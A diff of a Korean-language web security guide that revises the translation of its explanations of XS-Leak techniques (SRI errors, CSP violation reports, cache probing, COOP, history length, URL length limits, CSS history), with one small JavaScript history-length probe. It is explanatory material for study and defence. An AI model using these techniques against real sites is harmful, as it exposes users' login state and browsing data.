-- **요약:** 보안 주장(SA)에서 CORS 오류 메시지는 리디렉션된 요청의 전체 URL을 우연히 노출합니다.
+- **요약:** 보안 주장(SA)에서 CORS 오류 메시지는 리디렉션된 요청의 전체 URL을 무심코 노출합니다.
 - **코드 예제**: [https://xsinator.com/testing.html#SRI%20Error%20Leak](https://xsinator.com/testing.html#SRI%20Error%20Leak)
 
-공격자는 **상세한 오류 메시지**를 악용하여 교차 출처 응답의 크기를 추론할 수 있습니다. 이는 Subresource Integrity(SRI) 메커니즘 덕분에 가능하며, SRI는 무결성 속성을 사용하여 CDNs에서 가져온 리소스가 변조되지 않았는지 검증합니다. SRI가 교차 출처 리소스에서 작동하려면 **CORS가 활성화되어야** 하며, 그렇지 않으면 무결성 검사를 받지 않습니다. 보안 주장(SA)에서 CORS 오류 XS-Leak와 마찬가지로, 무결성 속성이 있는 fetch 요청이 실패한 후 오류 메시지를 캡처할 수 있습니다. 공격자는 **잘못된 해시 값**을 무결성 속성에 할당하여 이 오류를 의도적으로 **유발**할 수 있습니다. SA에서 결과 오류 메시지는 요청된 리소스의 콘텐츠 길이를 우연히 드러냅니다. 이 정보 유출은 공격자가 응답 크기의 변화를 식별할 수 있게 하여 정교한 XS-Leak 공격의 길을 열어줍니다.
+공격자는 **상세한 오류 메시지**를 이용해 교차 출처 응답의 크기를 유추할 수 있습니다. 이는 Subresource Integrity(SRI) 메커니즘 덕분에 가능하며, SRI는 리소스가 CDNs에서 가져온 경우 변조되지 않았는지 검증하기 위해 무결성 속성을 사용합니다. SRI가 교차 출처 리소스에서 작동하려면 **CORS가 활성화되어야** 하며, 그렇지 않으면 무결성 검사를 받지 않습니다. 보안 주장(SA)에서 CORS 오류 XS-Leak와 마찬가지로, 무결성 속성이 있는 fetch 요청이 실패한 후 오류 메시지를 캡처할 수 있습니다. 공격자는 **잘못된 해시 값**을 무결성 속성에 할당하여 이 오류를 의도적으로 **유발**할 수 있습니다. SA에서 결과 오류 메시지는 요청된 리소스의 콘텐츠 길이를 무심코 드러냅니다. 이 정보 유출은 공격자가 응답 크기의 변화를 식별할 수 있게 하여 정교한 XS-Leak 공격의 길을 열어줍니다.
 
 ### CSP 위반/감지
 
@@ -500,7 +500,7 @@ audioElement.onerror = errHandler
 - **요약:** CSP에서 피해자의 웹사이트만 허용할 경우, 다른 도메인으로 리디렉션을 시도하면 CSP가 감지 가능한 오류를 발생시킵니다.
 - **코드 예제**: [https://xsinator.com/testing.html#CSP%20Violation%20Leak](https://xsinator.com/testing.html#CSP%20Violation%20Leak), [https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#intended-solution-csp-violation](https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#intended-solution-csp-violation)
 
-XS-Leak는 CSP를 사용하여 교차 출처 사이트가 다른 출처로 리디렉션되었는지 감지할 수 있습니다. 이 유출은 리디렉션을 감지할 수 있지만, 추가로 리디렉션 대상의 도메인도 유출됩니다. 이 공격의 기본 아이디어는 **공격자 사이트에서 대상 도메인을 허용하는 것**입니다. 대상 도메인에 요청이 발행되면 **리디렉션**이 교차 출처 도메인으로 발생합니다. **CSP는** 이에 대한 접근을 차단하고 **유출 기법으로 사용되는 위반 보고서를 생성합니다**. 브라우저에 따라 **이 보고서는 리디렉션의 대상 위치를 유출할 수 있습니다**.\
+XS-Leak는 CSP를 사용하여 교차 출처 사이트가 다른 출처로 리디렉션되었는지 감지할 수 있습니다. 이 유출은 리디렉션을 감지할 수 있을 뿐만 아니라 리디렉션 대상의 도메인도 유출됩니다. 이 공격의 기본 아이디어는 **공격자 사이트에서 대상 도메인을 허용하는 것**입니다. 대상 도메인에 요청이 발행되면 **리디렉션**이 교차 출처 도메인으로 이루어집니다. **CSP는** 이에 대한 접근을 차단하고 **유출 기법으로 사용되는 위반 보고서를 생성합니다**. 브라우저에 따라 **이 보고서는 리디렉션의 대상 위치를 유출할 수 있습니다**.\
 현대 브라우저는 리디렉션된 URL을 표시하지 않지만, 여전히 교차 출처 리디렉션이 발생했음을 감지할 수 있습니다.
 
 ### 캐시
@@ -508,12 +508,12 @@ XS-Leak는 CSP를 사용하여 교차 출처 사이트가 다른 출처로 리
 - **포함 방법**: 프레임, 팝업
 - **감지 가능한 차이**: 페이지 콘텐츠
 - **자세한 정보**: [https://xsleaks.dev/docs/attacks/cache-probing/#cache-probing-with-error-events](https://xsleaks.dev/docs/attacks/cache-probing/#cache-probing-with-error-events), [https://sirdarckcat.blogspot.com/2019/03/http-cache-cross-site-leaks.html](https://sirdarckcat.blogspot.com/2019/03/http-cache-cross-site-leaks.html)
-- **요약:** 파일을 캐시에서 지웁니다. 대상 페이지를 열고 파일이 캐시에 있는지 확인합니다.
+- **요약:** 파일을 캐시에서 지웁니다. 대상 페이지를 열어 파일이 캐시에 있는지 확인합니다.
 - **코드 예제:**
 
-브라우저는 모든 웹사이트에 대해 하나의 공유 캐시를 사용할 수 있습니다. 출처에 관계없이 특정 파일이 **요청되었는지** 추론할 수 있습니다.
+브라우저는 모든 웹사이트에 대해 하나의 공유 캐시를 사용할 수 있습니다. 출처에 관계없이 특정 파일이 **요청되었는지** 유추할 수 있습니다.
 
-페이지가 사용자가 로그인한 경우에만 이미지를 로드하는 경우, **리소스를 무효화**하여 **요청**을 수행하고 **잘못된 요청**(예: 너무 긴 referer 헤더 사용)으로 리소스를 로드하려고 시도할 수 있습니다. 리소스 로드가 **오류를 유발하지 않았다면**, 이는 **캐시되었기 때문**입니다.
+페이지가 사용자가 로그인한 경우에만 이미지를 로드하는 경우, **리소스를 무효화**하여 **더 이상 캐시되지 않도록** 하고, 해당 리소스를 로드할 수 있는 **요청을 수행**하며 **잘못된 요청으로 리소스를 로드하려고 시도**합니다(예: 너무 긴 referer 헤더를 사용). 리소스 로드가 **어떤 오류도 발생시키지 않았다면**, 이는 **캐시되었기 때문**입니다.
 
 ### CSP 지시문
 
@@ -523,7 +523,7 @@ XS-Leak는 CSP를 사용하여 교차 출처 사이트가 다른 출처로 리
 - **요약:** CSP 헤더 지시문은 CSP iframe 속성을 사용하여 조사할 수 있으며, 정책 세부정보를 드러냅니다.
 - **코드 예제**: [https://xsinator.com/testing.html#CSP%20Directive%20Leak](https://xsinator.com/testing.html#CSP%20Directive%20Leak)
 
-Google Chrome(GC)의 새로운 기능은 웹 페이지가 iframe 요소에 속성을 설정하여 **콘텐츠 보안 정책(CSP)**를 제안할 수 있게 해주며, 정책 지시문은 HTTP 요청과 함께 전송됩니다. 일반적으로, 포함된 콘텐츠는 **HTTP 헤더를 통해 이를 승인해야 하며**, 그렇지 않으면 **오류 페이지가 표시됩니다**. 그러나 iframe이 이미 CSP에 의해 관리되고 새로 제안된 정책이 더 제한적이지 않으면 페이지는 정상적으로 로드됩니다. 이 메커니즘은 공격자가 오류 페이지를 식별하여 교차 출처 페이지의 **특정 CSP 지시문**을 감지할 수 있는 경로를 열어줍니다. 이 취약점은 수정된 것으로 표시되었지만, 우리의 발견은 오류 페이지를 감지할 수 있는 **새로운 유출 기법**을 드러내며, 근본적인 문제가 완전히 해결되지 않았음을 시사합니다.
+Google Chrome(GC)의 새로운 기능은 웹 페이지가 iframe 요소에 속성을 설정하여 **콘텐츠 보안 정책(CSP)**를 제안할 수 있게 해주며, 정책 지시문은 HTTP 요청과 함께 전송됩니다. 일반적으로, 포함된 콘텐츠는 **HTTP 헤더를 통해 이를 승인해야 하며**, 그렇지 않으면 **오류 페이지가 표시됩니다**. 그러나 iframe이 이미 CSP에 의해 관리되고 새로 제안된 정책이 더 제한적이지 않으면 페이지는 정상적으로 로드됩니다. 이 메커니즘은 공격자가 교차 출처 페이지의 **특정 CSP 지시문을 감지**할 수 있는 경로를 열어줍니다. 이 취약점은 수정된 것으로 표시되었지만, 우리의 발견은 오류 페이지를 감지할 수 있는 **새로운 유출 기법**을 드러내며, 근본적인 문제가 완전히 해결되지 않았음을 시사합니다.
 
 ### **CORP**
 
@@ -533,7 +533,7 @@ Google Chrome(GC)의 새로운 기능은 웹 페이지가 iframe 요소에 속
 - **요약:** 교차 출처 리소스 정책(CORP)으로 보호된 리소스는 허용되지 않는 출처에서 가져올 때 오류를 발생시킵니다.
 - **코드 예제**: [https://xsinator.com/testing.html#CORP%20Leak](https://xsinator.com/testing.html#CORP%20Leak)
 
-CORP 헤더는 비교적 새로운 웹 플랫폼 보안 기능으로, 설정되면 **주어진 리소스에 대한 no-cors 교차 출처 요청을 차단합니다**. CORP로 보호된 리소스는 **가져올 때 오류를 발생시킵니다**.
+CORP 헤더는 비교적 새로운 웹 플랫폼 보안 기능으로, 설정 시 **주어진 리소스에 대한 no-cors 교차 출처 요청을 차단합니다**. 헤더의 존재는 감지할 수 있으며, CORP로 보호된 리소스는 **가져올 때 오류를 발생시킵니다**.
 
 ### CORB
 
@@ -553,7 +553,7 @@ CORP 헤더는 비교적 새로운 웹 플랫폼 보안 기능으로, 설정되
 - **요약**: Origin 헤더가 `Access-Control-Allow-Origin` 헤더에 반영되면 리소스가 이미 캐시에 있는지 확인할 수 있습니다.
 - **코드 예제**: [https://xsleaks.dev/docs/attacks/cache-probing/#cors-error-on-origin-reflection-misconfiguration](https://xsleaks.dev/docs/attacks/cache-probing/#cors-error-on-origin-reflection-misconfiguration)
 
-**Origin 헤더**가 `Access-Control-Allow-Origin` 헤더에 **반영**되고 있다면, 공격자는 이 동작을 악용하여 **CORS** 모드에서 **리소스를 가져오려고 시도할 수 있습니다**. **오류**가 **발생하지 않으면**, 이는 **웹에서 올바르게 검색되었음을 의미하며**, 오류가 **발생하면**, 이는 **캐시에서 접근되었기 때문입니다**(오류는 캐시가 원래 도메인을 허용하는 CORS 헤더가 있는 응답을 저장하기 때문에 발생합니다).\
+**Origin 헤더**가 `Access-Control-Allow-Origin` 헤더에 **반영**되고 있다면, 공격자는 이 동작을 악용하여 **CORS** 모드에서 **리소스를 가져오려고 시도**할 수 있습니다. **오류**가 **발생하지 않으면**, 이는 **웹에서 올바르게 검색되었음을 의미**하며, 오류가 **발생하면**, 이는 **캐시에서 접근되었기 때문**입니다(오류는 캐시가 원래 도메인을 허용하는 CORS 헤더가 있는 응답을 저장하기 때문에 발생합니다).\
 Origin이 반영되지 않고 와일드카드가 사용되는 경우(`Access-Control-Allow-Origin: *`), 이는 작동하지 않습니다.
 
 ## 읽을 수 있는 속성 기술
@@ -566,7 +566,7 @@ Origin이 반영되지 않고 와일드카드가 사용되는 경우(`Access-Con
 - **요약:** GC와 SA는 리디렉션이 완료된 후 응답의 유형(opaque-redirect)을 확인할 수 있습니다.
 - **코드 예제**: [https://xsinator.com/testing.html#Fetch%20Redirect%20Leak](https://xsinator.com/testing.html#Fetch%20Redirect%20Leak)
 
-`redirect: "manual"` 및 기타 매개변수를 사용하여 Fetch API를 통해 요청을 제출하면, `response.type` 속성을 읽을 수 있으며, 이 값이 `opaqueredirect`와 같으면 응답이 리디렉션이었습니다.
+`redirect: "manual"` 및 기타 매개변수를 사용하여 Fetch API를 통해 요청을 제출하면, `response.type` 속성을 읽을 수 있으며, 이 값이 `opaqueredirect`와 같다면 응답이 리디렉션이었습니다.
 
 ### COOP
 
@@ -576,20 +576,20 @@ Origin이 반영되지 않고 와일드카드가 사용되는 경우(`Access-Con
 - **요약:** 교차 출처 오프너 정책(COOP)으로 보호된 페이지는 교차 출처 상호작용으로부터의 접근을 차단합니다.
 - **코드 예제**: [https://xsinator.com/testing.html#COOP%20Leak](https://xsinator.com/testing.html#COOP%20Leak)
 
-공격자는 교차 출처 HTTP 응답에서 교차 출처 오프너 정책(COOP) 헤더의 존재를 추론할 수 있습니다. COOP는 웹 애플리케이션이 외부 사이트가 임의의 창 참조를 얻지 못하도록 방지하는 데 사용됩니다. 이 헤더의 가시성은 **`contentWindow` 참조에 접근하려고 시도함으로써 감지할 수 있습니다**. COOP가 조건부로 적용되는 경우, **`opener` 속성**은 결정적인 지표가 됩니다: COOP가 활성화되면 **정의되지 않으며**, 비활성화되면 **정의됩니다**.
+공격자는 교차 출처 HTTP 응답에서 교차 출처 오프너 정책(COOP) 헤더의 존재를 유추할 수 있습니다. COOP는 웹 애플리케이션이 외부 사이트가 임의의 창 참조를 얻지 못하도록 방지하는 데 사용됩니다. 이 헤더의 가시성은 **`contentWindow` 참조에 접근하려고 시도함으로써 감지할 수 있습니다**. COOP가 조건부로 적용되는 경우, **`opener` 속성**은 결정적인 지표가 됩니다: COOP가 활성화되면 **정의되지 않으며**, 그렇지 않으면 **정의됩니다**.
 
 ### URL 최대 길이 - 서버 측
 
 - **포함 방법**: Fetch API, HTML 요소
 - **감지 가능한 차이**: 상태 코드 / 콘텐츠
 - **자세한 정보**: [https://xsleaks.dev/docs/attacks/navigations/#server-side-redirects](https://xsleaks.dev/docs/attacks/navigations/#server-side-redirects)
-- **요약:** 리디렉션 응답 길이로 인해 응답의 차이를 감지할 수 있으며, 너무 길면 서버가 오류로 응답하고 경고가 생성됩니다.
+- **요약:** 리디렉션 응답 길이로 인해 응답의 차이를 감지할 수 있습니다. 길이가 너무 커서 서버가 오류로 재생성하고 경고가 생성됩니다.
 - **코드 예제**: [https://xsinator.com/testing.html#URL%20Max%20Length%20Leak](https://xsinator.com/testing.html#URL%20Max%20Length%20Leak)
 
-서버 측 리디렉션이 **리디렉션 내에서 사용자 입력을 사용하고** **추가 데이터**를 포함하는 경우, 이 동작을 감지할 수 있습니다. 일반적으로 **서버**는 **요청 길이 제한**이 있습니다. **사용자 데이터**가 **길이 - 1**인 경우, **리디렉션**이 **해당 데이터**를 사용하고 **추가**적인 것을 더하기 때문에 **오류가 발생합니다**. 이 오류는 **오류 이벤트를 통해 감지할 수 있습니다**.
+서버 측 리디렉션이 **리디렉션 내에서 사용자 입력을 사용하고** **추가 데이터를 포함하는 경우**, 이 동작을 감지할 수 있습니다. 일반적으로 **서버**는 **요청 길이 제한**이 있습니다. **사용자 데이터**가 **길이 - 1**인 경우, **리디렉션**이 **해당 데이터**를 사용하고 **추가**하는 경우, **오류가 발생하여 오류 이벤트를 통해 감지할 수 있습니다**.
 
-사용자에게 쿠키를 설정할 수 있는 경우, **충분한 쿠키를 설정하여** 이 공격을 수행할 수도 있습니다 ([**쿠키 폭탄**](../hacking-with-cookies/cookie-bomb.md)). 이 경우, **정상 응답의 크기 증가**로 인해 **오류**가 발생합니다. 이 요청을 동일한 사이트에서 트리거하면 `<script>`가 자동으로 쿠키를 전송하므로 **오류를 확인할 수 있습니다**.\
-**쿠키 폭탄 + XS-Search**의 예시는 이 문서의 의도된 솔루션에서 찾을 수 있습니다: [https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#intended](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#intended)
+사용자에게 쿠키를 설정할 수 있는 경우, **충분한 쿠키를 설정하여** 이 공격을 수행할 수도 있습니다([**쿠키 폭탄**](../hacking-with-cookies/cookie-bomb.md)). 이 경우, **정상 응답의 크기가 증가하여** 오류가 발생합니다. 이 요청을 동일한 사이트에서 트리거하면 `<script>`가 자동으로 쿠키를 전송하므로(따라서 오류를 확인할 수 있습니다).\
+**쿠키 폭탄 + XS-Search**의 예는 이 문서의 의도된 솔루션에서 찾을 수 있습니다: [https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#intended](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#intended)
 
 `SameSite=None` 또는 동일한 컨텍스트에 있어야 이 유형의 공격이 일반적으로 필요합니다.
 
@@ -603,13 +603,13 @@ Origin이 반영되지 않고 와일드카드가 사용되는 경우(`Access-Con
 
 [Chromium 문서](https://chromium.googlesource.com/chromium/src/+/main/docs/security/url_display_guidelines/url_display_guidelines.md#URL-Length)에 따르면, Chrome의 최대 URL 길이는 2MB입니다.
 
-> 일반적으로, _웹 플랫폼_은 URL 길이에 대한 제한이 없습니다(2^31이 일반적인 제한이지만). _Chrome_은 실용적인 이유로 URL을 최대 **2MB**로 제한하여 프로세스 간 통신에서 서비스 거부 문제를 피합니다.
+> 일반적으로, _웹 플랫폼_은 URL 길이에 대한 제한이 없습니다(2^31이 일반적인 제한이지만). _Chrome_은 실용적인 이유로 최대 **2MB**로 URL 길이를 제한하며, 프로세스 간 통신에서 서비스 거부 문제를 피하기 위해서입니다.
 
-따라서 **리디렉션 URL이 한 경우에 더 큰 응답을 반환하면**, **2MB보다 큰 URL로 리디렉션**할 수 있습니다. 이 경우, Chrome은 **`about:blank#blocked`** 페이지를 표시합니다.
+따라서 **리디렉션 URL의 응답이 한 경우보다 더 크다면**, **2MB보다 큰 URL로 리디렉션**하여 **길이 제한**에 도달할 수 있습니다. 이 경우, Chrome은 **`about:blank#blocked`** 페이지를 표시합니다.
 
-**눈에 띄는 차이점**은 **리디렉션**이 **완료되었을 경우**, `window.origin`이 **오류를 발생시키는 것**입니다. 교차 출처는 해당 정보를 접근할 수 없습니다. 그러나 **제한**이 **초과**되고 로드된 페이지가 **`about:blank#blocked`**인 경우, 창의 **`origin`**은 **부모**의 것이며, 이는 **접근 가능한 정보**입니다.
+**눈에 띄는 차이점**은 **리디렉션**이 **완료되었다면**, `window.origin`이 **오류를 발생시키는** 것입니다. 교차 출처는 해당 정보를 접근할 수 없기 때문입니다. 그러나 **제한**이 **도달**하고 로드된 페이지가 **`about:blank#blocked`**인 경우, 창의 **`origin`**은 **부모**의 것이며, 이는 **접근 가능한 정보**입니다.
 
-**2MB**에 도달하는 데 필요한 모든 추가 정보는 초기 URL에 **해시**를 추가하여 **리디렉션**에 사용될 수 있습니다.
+**2MB**에 도달하기 위해 필요한 모든 추가 정보는 초기 URL에 **해시**를 추가하여 **리디렉션에 사용될 수 있습니다**.
 
 {{#ref}}
 url-max-length-client-side.md
@@ -623,7 +623,7 @@ url-max-length-client-side.md
 - **요약:** 브라우저의 리디렉션 제한을 사용하여 URL 리디렉션의 발생 여부를 확인합니다.
 - **코드 예제**: [https://xsinator.com/testing.html#Max%20Redirect%20Leak](https://xsinator.com/testing.html#Max%20Redirect%20Leak)
 
-브라우저의 **최대** 리디렉션 수가 **20**인 경우, 공격자는 **19개의 리디렉션**으로 자신의 페이지를 로드하려고 시도하고 마지막으로 **피해자를 테스트된 페이지로 보냅니다**. **오류**가 발생하면, 페이지가 피해자를 **리디렉션하려고 시도한 것입니다**.
+브라우저의 **최대** 리디렉션 수가 **20**인 경우, 공격자는 **19개의 리디렉션**으로 자신의 페이지를 로드하려고 시도하고 마지막에 **피해자를 테스트된 페이지로 보냅니다**. **오류**가 발생하면, 페이지가 **피해자를 리디렉션하려고 시도한 것입니다**.
 
 ### 히스토리 길이
 
@@ -634,7 +634,7 @@ url-max-length-client-side.md
 - **코드 예제**: [https://xsinator.com/testing.html#History%20Length%20Leak](https://xsinator.com/testing.html#History%20Length%20Leak)
 
 **History API**는 JavaScript 코드가 브라우저 히스토리를 조작할 수 있게 해주며, 이는 **사용자가 방문한 페이지를 저장합니다**. 공격자는 길이 속성을 포함 방법으로 사용할 수 있습니다: JavaScript 및 HTML 탐색을 감지하기 위해.\
-**`history.length`**를 확인하고 사용자가 **페이지로 이동**한 후, **다시** 동일 출처로 **변경**하고 **`history.length`**의 새 값을 확인합니다.
+**`history.length`**를 확인하고 사용자가 **페이지로 탐색**하게 한 후, **다시 동일 출처로 변경**하고 **`history.length`**의 새 값을 확인합니다.
 
 ### 동일 URL로 히스토리 길이
 
@@ -643,7 +643,7 @@ url-max-length-client-side.md
 - **요약:** 히스토리 길이를 악용하여 프레임/팝업의 위치가 특정 URL에 있는지 추측할 수 있습니다.
 - **코드 예제**: 아래
 
-공격자는 JavaScript 코드를 사용하여 **프레임/팝업 위치를 추측한 URL로 조작하고** **즉시** **`about:blank`**로 변경할 수 있습니다. 히스토리 길이가 증가하면 URL이 올바르며 **증가할 시간이 있었음을 의미합니다**. URL이 동일하면 다시 로드되지 않기 때문입니다. 증가하지 않았다면, **추측한 URL을 로드하려고 시도했지만**, **즉시 후에** **`about:blank`**를 로드했기 때문에 **히스토리 길이가 증가하지 않았습니다**.
+공격자는 JavaScript 코드를 사용하여 **프레임/팝업 위치를 추측한 URL로 조작하고** **즉시** **`about:blank`**로 변경할 수 있습니다. 히스토리 길이가 증가했다면 URL이 정확했음을 의미하며, URL이 동일할 경우 **재로드되지 않기 때문에 증가할 시간이 있었습니다**. 증가하지 않았다면 **추측한 URL을 로드하려고 시도했지만**, **즉시 이후에** **`about:blank`**를 로드했기 때문에 **히스토리 길이가 증가하지 않았습니다**.
 ```javascript
 async function debug(win, url) {
 win.location = url + "#aaa"
@@ -672,7 +672,7 @@ console.log(await debug(win, "https://example.com/?a=b"))
 웹에서 `iframe` 또는 `window.open`을 통해 열린 **프레임의 수**를 세는 것은 **사용자의 상태를 식별하는 데 도움이 될 수 있습니다**.\
 또한, 페이지에 항상 동일한 수의 프레임이 있는 경우, 프레임 수를 **지속적으로** 확인하면 정보가 유출될 수 있는 **패턴**을 식별하는 데 도움이 될 수 있습니다.
 
-이 기술의 예로, 크롬에서는 **PDF**가 **프레임 카운팅**으로 **감지될 수 있습니다**. 내부적으로 `embed`가 사용되기 때문입니다. `zoom`, `view`, `page`, `toolbar`와 같은 콘텐츠에 대한 일부 제어를 허용하는 [Open URL Parameters](https://bugs.chromium.org/p/chromium/issues/detail?id=64309#c113)가 있어 이 기술이 흥미로울 수 있습니다.
+이 기술의 예로, 크롬에서는 **PDF**가 **프레임 카운팅**으로 **감지**될 수 있습니다. 내부적으로 `embed`가 사용되기 때문입니다. `zoom`, `view`, `page`, `toolbar`와 같은 콘텐츠에 대한 일부 제어를 허용하는 [Open URL Parameters](https://bugs.chromium.org/p/chromium/issues/detail?id=64309#c113)가 있어 이 기술이 흥미로울 수 있습니다.
 
 ### HTMLElements
 
@@ -686,10 +686,10 @@ HTML 요소를 통한 정보 유출은 웹 보안에서 우려되는 문제로,
 
 ### Information Exposed by HTML Elements
 
-- **HTMLMediaElement**: 이 요소는 미디어의 `duration` 및 `buffered` 시간을 노출하며, API를 통해 접근할 수 있습니다. [HTMLMediaElement에 대해 더 읽기](https://developer.mozilla.org/en-US/docs/Web/API/HTMLMediaElement)
-- **HTMLVideoElement**: `videoHeight` 및 `videoWidth`를 노출합니다. 일부 브라우저에서는 `webkitVideoDecodedByteCount`, `webkitAudioDecodedByteCount`, `webkitDecodedFrameCount`와 같은 추가 속성이 제공되어 미디어 콘텐츠에 대한 더 깊은 정보를 제공합니다. [HTMLVideoElement에 대해 더 읽기](https://developer.mozilla.org/en-US/docs/Web/API/HTMLVideoElement)
-- **getVideoPlaybackQuality()**: 이 함수는 비디오 재생 품질에 대한 세부 정보를 제공하며, `totalVideoFrames`를 포함하여 처리된 비디오 데이터의 양을 나타낼 수 있습니다. [getVideoPlaybackQuality()에 대해 더 읽기](https://developer.mozilla.org/en-US/docs/Web/API/VideoPlaybackQuality)
-- **HTMLImageElement**: 이 요소는 이미지의 `height` 및 `width`를 유출합니다. 그러나 이미지가 유효하지 않은 경우 이러한 속성은 0을 반환하며, `image.decode()` 함수는 거부되어 이미지를 제대로 로드하지 못했음을 나타냅니다. [HTMLImageElement에 대해 더 읽기](https://developer.mozilla.org/en-US/docs/Web/API/HTMLImageElement)
+- **HTMLMediaElement**: 이 요소는 미디어의 `duration` 및 `buffered` 시간을 노출하며, API를 통해 접근할 수 있습니다. [Read more about HTMLMediaElement](https://developer.mozilla.org/en-US/docs/Web/API/HTMLMediaElement)
+- **HTMLVideoElement**: `videoHeight` 및 `videoWidth`를 노출합니다. 일부 브라우저에서는 `webkitVideoDecodedByteCount`, `webkitAudioDecodedByteCount`, `webkitDecodedFrameCount`와 같은 추가 속성이 제공되어 미디어 콘텐츠에 대한 더 깊이 있는 정보를 제공합니다. [Read more about HTMLVideoElement](https://developer.mozilla.org/en-US/docs/Web/API/HTMLVideoElement)
+- **getVideoPlaybackQuality()**: 이 함수는 비디오 재생 품질에 대한 세부 정보를 제공하며, `totalVideoFrames`를 포함하여 처리된 비디오 데이터의 양을 나타낼 수 있습니다. [Read more about getVideoPlaybackQuality()](https://developer.mozilla.org/en-US/docs/Web/API/VideoPlaybackQuality)
+- **HTMLImageElement**: 이 요소는 이미지의 `height` 및 `width`를 유출합니다. 그러나 이미지가 유효하지 않은 경우 이러한 속성은 0을 반환하며, `image.decode()` 함수는 거부되어 이미지를 제대로 로드하지 못했음을 나타냅니다. [Read more about HTMLImageElement](https://developer.mozilla.org/en-US/docs/Web/API/HTMLImageElement)
 
 ### CSS Property
 
@@ -700,7 +700,7 @@ HTML 요소를 통한 정보 유출은 웹 보안에서 우려되는 문제로,
 - **Code Example**: [https://xsinator.com/testing.html#CSS%20Property%20Leak](https://xsinator.com/testing.html#CSS%20Property%20Leak)
 
 웹 애플리케이션은 사용자의 상태에 따라 **웹사이트 스타일을 변경할 수 있습니다**. 공격자 페이지에 **HTML 링크 요소**를 사용하여 교차 출처 CSS 파일을 삽입할 수 있으며, **규칙**은 공격자 페이지에 **적용됩니다**. 페이지가 이러한 규칙을 동적으로 변경하는 경우, 공격자는 사용자 상태에 따라 이러한 **차이**를 **감지**할 수 있습니다.\
-유출 기술로서, 공격자는 `window.getComputedStyle` 메서드를 사용하여 특정 HTML 요소의 **CSS** 속성을 **읽을 수 있습니다**. 결과적으로, 공격자는 영향을 받는 요소와 속성 이름이 알려져 있다면 임의의 CSS 속성을 읽을 수 있습니다.
+유출 기술로서, 공격자는 `window.getComputedStyle` 메서드를 사용하여 특정 HTML 요소의 **CSS** 속성을 **읽을 수 있습니다**. 결과적으로, 영향을 받는 요소와 속성 이름이 알려져 있다면 공격자는 임의의 CSS 속성을 읽을 수 있습니다.
 
 ### CSS History
 
@@ -715,9 +715,9 @@ HTML 요소를 통한 정보 유출은 웹 보안에서 우려되는 문제로,
 
 CSS `:visited` 선택자는 사용자가 이전에 방문한 경우 URL을 다르게 스타일링하는 데 사용됩니다. 과거에는 `getComputedStyle()` 메서드를 사용하여 이러한 스타일 차이를 식별할 수 있었습니다. 그러나 최신 브라우저는 이 메서드가 링크의 상태를 노출하지 않도록 보안 조치를 구현했습니다. 이러한 조치에는 링크가 방문된 것처럼 항상 계산된 스타일을 반환하고 `:visited` 선택자로 적용할 수 있는 스타일을 제한하는 것이 포함됩니다.
 
-이러한 제한에도 불구하고 링크의 방문 상태를 간접적으로 식별할 수 있습니다. 한 가지 기술은 사용자가 CSS에 영향을 받는 영역과 상호작용하도록 유도하는 것입니다. 특히 `mix-blend-mode` 속성을 활용합니다. 이 속성은 요소와 배경을 혼합할 수 있게 하여 사용자 상호작용에 따라 방문 상태를 드러낼 수 있습니다.
+이러한 제한에도 불구하고, 링크의 방문 상태를 간접적으로 식별할 수 있는 방법이 있습니다. 한 가지 기술은 사용자가 CSS에 영향을 받는 영역과 상호작용하도록 유도하는 것입니다. 특히 `mix-blend-mode` 속성을 활용합니다. 이 속성은 요소와 배경을 혼합할 수 있게 하여 사용자 상호작용에 따라 방문 상태를 드러낼 수 있습니다.
 
-또한, 링크의 렌더링 타이밍을 악용하여 사용자 상호작용 없이 감지가 가능합니다. 브라우저는 방문한 링크와 방문하지 않은 링크를 다르게 렌더링할 수 있으므로, 이는 렌더링에서 측정 가능한 시간 차이를 초래할 수 있습니다. 개념 증명(PoC)은 여러 링크를 사용하여 타이밍 차이를 증폭시키는 이 기술을 보여주는 크롬 버그 보고서에서 언급되었습니다. 이를 통해 방문 상태를 타이밍 분석을 통해 감지할 수 있습니다.
+또한, 링크의 렌더링 타이밍을 악용하여 사용자 상호작용 없이 감지가 가능합니다. 브라우저는 방문한 링크와 방문하지 않은 링크를 다르게 렌더링할 수 있으므로, 이는 렌더링에서 측정 가능한 시간 차이를 초래할 수 있습니다. 타이밍 분석을 통해 방문 상태를 감지할 수 있도록 여러 링크를 사용하여 타이밍 차이를 증폭시키는 기술이 크로미움 버그 보고서에서 언급되었습니다.
 
 이러한 속성과 방법에 대한 자세한 내용은 문서 페이지를 방문하십시오:
 
@@ -733,7 +733,7 @@ CSS `:visited` 선택자는 사용자가 이전에 방문한 경우 URL을 다
 - **Summary:** Google Chrome에서는 X-Frame-Options 제한으로 인해 페이지가 교차 출처 사이트에 포함되는 것이 차단될 때 전용 오류 페이지가 표시됩니다.
 - **Code Example**: [https://xsinator.com/testing.html#ContentDocument%20X-Frame%20Leak](https://xsinator.com/testing.html#ContentDocument%20X-Frame%20Leak)
 
-크롬에서 `X-Frame-Options` 헤더가 "deny" 또는 "same-origin"으로 설정된 페이지가 객체로 포함되면 오류 페이지가 나타납니다. 크롬은 이 객체의 `contentDocument` 속성에 대해 빈 문서 객체(대신 `null`이 아님)를 고유하게 반환합니다. 이는 iframe이나 다른 브라우저와는 다릅니다. 공격자는 빈 문서를 감지하여 사용자의 상태에 대한 정보를 유출할 수 있습니다. 특히 개발자가 X-Frame-Options 헤더를 일관되게 설정하지 않고 오류 페이지를 간과하는 경우 더욱 그렇습니다. 이러한 유출을 방지하기 위해 보안 헤더의 인식과 일관된 적용이 중요합니다.
+크롬에서 `X-Frame-Options` 헤더가 "deny" 또는 "same-origin"으로 설정된 페이지가 객체로 포함되면 오류 페이지가 나타납니다. 크롬은 이 객체의 `contentDocument` 속성에 대해 빈 문서 객체(대신 `null`이 아님)를 고유하게 반환하며, 이는 iframe이나 다른 브라우저와는 다릅니다. 공격자는 빈 문서를 감지하여 사용자의 상태에 대한 정보를 유출할 수 있습니다. 특히 개발자가 X-Frame-Options 헤더를 일관되게 설정하지 않고 오류 페이지를 간과하는 경우 더욱 그렇습니다. 이러한 유출을 방지하기 위해 보안 헤더의 인식과 일관된 적용이 중요합니다.
 
 ### Download Detection
 
